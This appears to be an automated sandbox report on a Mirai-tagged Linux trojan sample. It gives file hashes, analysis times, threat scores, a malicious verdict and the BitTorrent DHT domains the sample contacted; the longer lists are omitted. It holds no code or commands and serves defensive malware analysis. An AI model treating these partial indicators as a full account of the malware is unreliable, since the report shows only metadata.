flash

rIbyGX66Op

Status: finished
Submission Time: 2021-04-25 21:12:06 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID:
    397469
  • API (Web) ID:
    697096
  • Analysis Started:
    2021-04-25 21:12:42 +02:00
  • Analysis Finished:
    2021-04-25 21:23:27 +02:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Verdict: malicious

Scores:
  • 100/100
  • 41/60
  • 20/37
  • 20/29

IPs

100 contacted IP addresses, each with a country attribution (list omitted).

Domains

Name                     IP
dht.transmissionbt.com   212.129.33.59
bttracker.acc.umu.se     130.239.18.159
router.bittorrent.com    67.215.246.10
router.utorrent.com      82.221.103.244
bttracker.debian.org     0.0.0.0

URLs

38 URL strings extracted from the sample (list omitted).

Dropped files

100 dropped or modified files with file-type attribution (list omitted).